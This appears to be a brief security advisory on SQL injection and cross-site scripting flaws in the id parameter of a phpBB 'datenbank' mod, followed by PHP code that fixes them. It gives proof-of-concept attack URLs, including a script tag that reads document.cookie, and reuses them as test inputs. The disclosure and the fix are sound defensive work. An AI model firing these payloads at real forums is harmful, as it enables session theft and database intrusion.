phpBB datenbank mod has XSS/SQL Injection in the id variable




vulnerable mod:
datenbank

explanation:
SQL injection and cross-site scripting payloads can be passed in the id variable of mod.php (mod-datenbank).

exploit:
http://[target]/phpBB/moddb/mod.php?id='[SQL Injection] 
http://[target]/phpBB/moddb/mod.php?id='><script>alert(document.cookie)</script>

These bugs were discovered by: neO
SGT SecurityGurus Team 
www.securitygurus.net 
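
One way to close both holes in the id parameter, shown as an added example rather than the mod's own code: accept only an integer, bind it as a query parameter, and HTML-encode stored data on output. PDO with in-memory SQLite stands in for the forum database; the moddb_entries table, its columns and the function names are assumptions.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the mod's database (schema is an assumption).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE moddb_entries (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO moddb_entries (id, title) VALUES (7, 'Sample <b>entry</b>')");

/** Accept only a plain positive decimal integer (max 9 digits); else null. */
function parse_id(?string $raw): ?int
{
    if ($raw === null || !preg_match('/\A[1-9][0-9]{0,8}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

/** Handle one request; returns [HTTP status, HTML body]. */
function render_entry(PDO $pdo, ?string $rawId): array
{
    $id = parse_id($rawId);
    if ($id === null) {
        // Never echo the rejected value back into the page.
        return [400, '<p>Invalid id.</p>'];
    }
    // Bound parameter: the value is never part of the SQL text.
    $stmt = $pdo->prepare('SELECT id, title FROM moddb_entries WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return [404, '<p>No such entry.</p>'];
    }
    // Encode on output, quotes included, so stored markup renders as text.
    $title = htmlspecialchars((string) $row['title'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return [200, sprintf('<a href="mod.php?id=%d">%s</a>', $id, $title)];
}

// Constructed inputs: a valid id, then the two request shapes from the advisory.
foreach (['7', "'", "'><script>alert(document.cookie)</script>"] as $raw) {
    [$status, $body] = render_entry($pdo, $raw);
    printf("%-48s => %d %s\n", var_export($raw, true), $status, $body);
}
```

Only the first input reaches the database; the other two are rejected with a fixed 400 body that contains none of the submitted text.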

